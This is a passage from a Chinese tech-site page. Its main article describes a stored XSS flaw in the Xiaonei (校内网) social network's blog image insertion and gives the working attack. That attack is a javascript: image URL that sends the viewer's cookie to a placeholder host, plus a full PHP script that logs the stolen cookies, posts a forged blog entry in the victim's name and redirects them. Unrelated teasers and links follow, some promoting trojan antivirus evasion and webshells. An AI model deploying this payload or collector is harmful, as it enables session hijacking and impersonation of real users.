校内网漏洞 校内网存在xss漏洞
校内网在发blog时对插入图片过滤不严格,存在xss漏洞.
在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie
javascript:window.location.href='http://www.xxx.com/test.php?cookie='+document.cookie test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:普通浏览复制代码打印代码
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt
//发一条伪造的日志,这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
//echo $body;
//跳转到一个正常的日志
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");
ob_end_flush();
?>
路由器的功能是什么?家用路由器有哪些功能?
通信部门允许每个宽带用户使用两台电脑共享上网,这用户自己需要加装一个宽带路由器。那么,应该购买什么样的路由器才比较合适呢?现在的宽带路由器不少功能对于一般家庭用户来说确实非常实用,可以提高很多网络
详情2018-01-07 12:43:34责编:llp 来源:驱动管家验证码破解有怎么样的机制?验证码破解实例
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码
详情2018-01-14 16:04:52责编:llp 来源:驱动管家黑客怎么入侵个人电脑?怎么发现黑客入侵个人电脑?
大家好,我是StevenAngell,现在攻击个人电脑的木马软件很多,功能比以前多了,使用也比以前方便多了,所以危害也比以前大了,奇奇发现很多人中了木马自己还不知道,我就写了一点心得,给大家作个参考。 要想使
详情2018-01-19 18:57:28责编:llp 来源:驱动管家wapiti是什么?轻量级wapiti能检测出哪些漏洞?
Wapiti是Web应用程序漏洞错误检查工具。它具有“暗箱操作”扫描,即它不关心Web应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。它用于检测网页,看脚本是否脆弱的。Wapiti是一个开
详情2018-01-23 09:55:08责编:llp 来源:驱动管家web安全问题 csrf攻击怎么防御?
前言我们在前端面试过程中遇到的另一个最多的问题就是web安全了,这次我们来聊聊CSRF攻击。CSRF是一种常见的攻击,但是也是web安全中最容易被忽略的一种攻击方式。下面话不多说了,来一起看看详细的介绍吧。什么
详情2018-01-22 14:37:59责编:llp 来源:驱动管家ntfs文件系统的使用教程 ntfs文件加密文件夹的问题解答
我们知道NTFS文件格式可以实现对文件夹的加密,增强了文件的安全性,但因NTFS涉及的细节内容比较复杂,所以用NTFS加密后的文件由于我们的操作不当经常会出现一些问题,比如用户名丢失后、文件密码丢失了等等,都
详情2018-01-23 18:20:23责编:llp 来源:驱动管家磁盘保护工具 磁盘加密的七种工具
TruCrypt、PGP、FreeOTFE、BitLocker、DriveCrypt和7-Zip,这些加密程序提供了异常可靠的实时加密功能,可以为你确保数据安全,避免数据丢失、被偷以及被窥视。很少有IT专业人士还需要数据安全方面的培训,但是我
详情2018-01-05 16:31:25责编:llp 来源:驱动管家木马免杀怎么改特征码?木马免杀改特征码的经验分享
木马免杀,在国内应该起源于05年吧 从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御 免杀技术越来越难 但是万变不离其宗--改特征码 到现在一些辅助软件的行为查杀 以下讲解都是以远程控制软件
详情2018-01-03 10:00:32责编:llp 来源:驱动管家你知道中国菜刀吗?网站管理软件中国菜刀怎么用?
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候
详情2018-01-24 11:01:35责编:llp 来源:驱动管家什么是ipc?什么是空会话?
ipc$一 摘要网上关于 ipc$入侵的文章可谓多如牛毛,攻击步骤甚至已经成为了固化的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,我认为这些文章讲解的并不详细,一些内容甚至是错
详情2018-01-05 09:04:38责编:llp 来源:驱动管家
- 微信小程序申请内测的流程是什么?微信小程序申请内测方法
- 网易严选旧订单可以删除吗?网易严选已完成订单删除方法
- 360随身wifi是什么?360随身wifi怎么用
- 这款新出的便携式移动电源技术到底有多强?一起来看下
- 电脑桌面上固定的系统图标能不能更换
- qq聊天记录在哪个文件夹?怎么导出qq聊天记录
- 华为mate10怎么样?华为mate10有哪些优势?
- 出门预测天气?miui开发版能预测2小时天气状况
- 电脑无法识别usb设备怎么办?USB设备不能在电脑使用的解决办法
- 为什么电脑关机后自动重启?电脑关机后自动重启解决办法
- mssql2005怎么入侵提权?sql 2005提权的过程
- 电子邮件系统加密方法 电子邮件加密的一些建议
- 目前市场上有哪些3d打印机的品牌?3d打印机各品牌报价多少?
- 淘宝千牛可以添加好友吗?淘宝千牛添加好友的办法
- 小米wifi共享电脑硬盘文件的操作方法详解
- ipad充电充不进是什么原因?ipad充电充不进怎解决
- 文件解压的过程中系统为什么总是出错?
- win10电脑开启和关闭飞行模式的三种方法
- 小米note配置信息 小米note配置告诉你是否值得买?
- 体验wp8.1开发者预览版就必须了解wp8解锁教程解锁手机